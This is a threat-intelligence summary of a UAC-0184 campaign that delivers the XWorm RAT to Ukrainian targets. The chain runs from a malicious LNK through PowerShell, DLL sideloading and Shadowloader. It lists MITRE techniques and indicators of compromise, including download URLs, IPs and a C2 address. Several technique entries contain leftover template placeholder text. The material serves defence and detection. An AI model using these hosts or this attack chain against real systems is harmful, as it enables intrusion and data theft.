CRIL identified a UAC-0184-linked campaign that delivers the XWorm RAT using DLL sideloading and Shadowloader, beginning with a malicious LNK that triggers PowerShell to fetch a ZIP containing Python components and an encrypted payload. The final payload attempts to reach a C2 server, though the server was inactive during analysis. #UAC-0184 #XWorm #Remcos #Shadowloader #ShadowLadder #IDATLoader #GHOSTPULSE #Ukraine
Keypoints
- CRIL found a malware campaign linked to the UAC-0184 threat actor using a malicious LNK to seed the XWorm RAT via a PowerShell-downloaded ZIP containing Python components and an encrypted payload.
- UAC-0184 previously targeted Ukrainian entities in Finland and used the Remcos RAT in past operations.
- The latest activity appears focused on Ukraine, employing disguised lure documents to distribute XWorm.
- The LNK triggers a PowerShell script that downloads pkg.zip and NewCopy.xlsx, storing files under appdata and launching pythonw.exe.
- DLL sideloading and Shadowloader are employed to execute the XWorm final payload, with process hollowing into MSBuild.
- XWorm attempts to contact a C2 server, but the server was inactive at the time of CRIL’s analysis, yielding no observed malicious activity.
MITRE Techniques
- [T1064] Scripting – Brief description of how it was used. Quote relevant content using bracket (‘Executes visual basic scripts’)
- [T1059.001] PowerShell – Brief description of how it was used. Quote relevant content using bracket (‘Powershell downloads PE & ZIP files’)
- [T1547.001] Registry Run Keys / Startup Folder – Brief description of how it was used. Quote relevant content using bracket (‘Creates a start menu entry (Start MenuProgramsStartup)’)
- [T1574.002] DLL Side-Loading – Brief description of how it was used. Quote relevant content using bracket (‘Adversaries may execute their own malicious payloads by side-loading DLLs.’)
- [T1055] Process Injection – Brief description of how it was used. Quote relevant content using bracket (‘Injects malicious content into MSBuild.exe process.’)
- [T1027] Obfuscated/Compressed Files or Information – Brief description of how it was used. Quote relevant content using bracket (‘Net Binary include packed or crypted data.’)
- [T1140] Deobfuscate/Decode Files or Information – Brief description of how it was used. Quote relevant content using bracket (‘Deobfuscate/Decode Files or Information’)
- [T1057] Process Discovery – Brief description of how it was used. Quote relevant content using bracket (‘Queries a list of all running processes.’)
- [T1518.001] Security Software Discovery – Brief description of how it was used. Quote relevant content using bracket (‘May try to detect the virtual machine to hinder analysis’)
- [T1071] Application Layer Protocol – Brief description of how it was used. Quote relevant content using bracket (‘Malware exe communicate to C&C server.’)
- [T1105] Ingress Tool Transfer – Brief description of how it was used. Quote relevant content using bracket (‘Downloads files from webservers via HTTP’)
Indicators of Compromise
- [Sha256] context – NewCopy.xlsx.lnk, Pkg.zip (bf5a2450f5287f775c2427590c29c27e28e3662c2f68296c64cdacdb639f3b97, 38dea3732044129bd99314de582ba3d58a649c8967fe12b98cd867ca6e349ffe)
- [URL] context – Malicious download URLs (hxxp://88.151.192[.]128/djfhu34u9983234s3fnvmxxzpkg.zip, hxxp://81.19.139[.]62/f8d79yuhjhlgdjlsjkf83da0pkg.zip)
- [IP Address] context – 88.151.192.128, 81.19.139.62
- [Filename] context – XWorm, sud.exe, vcl120.bpl, vmtcuv.vbs
- [LNK] context – NewCopy.xlsx.lnk, Відомості про кредитора.dvs. (LNK shortcut files)
- [C2] context – http://185.216.68[.]142:9000/hooks/xxx?id=%computername%
- [ZIP] context – Pkg.zip, NewCopy.xlsx
- [DLL] context – VCL120.dll (via DLL side-loading)
Read more: https://cyble.com/blog/uac-0184-abuses-python-in-dll-sideloading-for-xworm-distribution/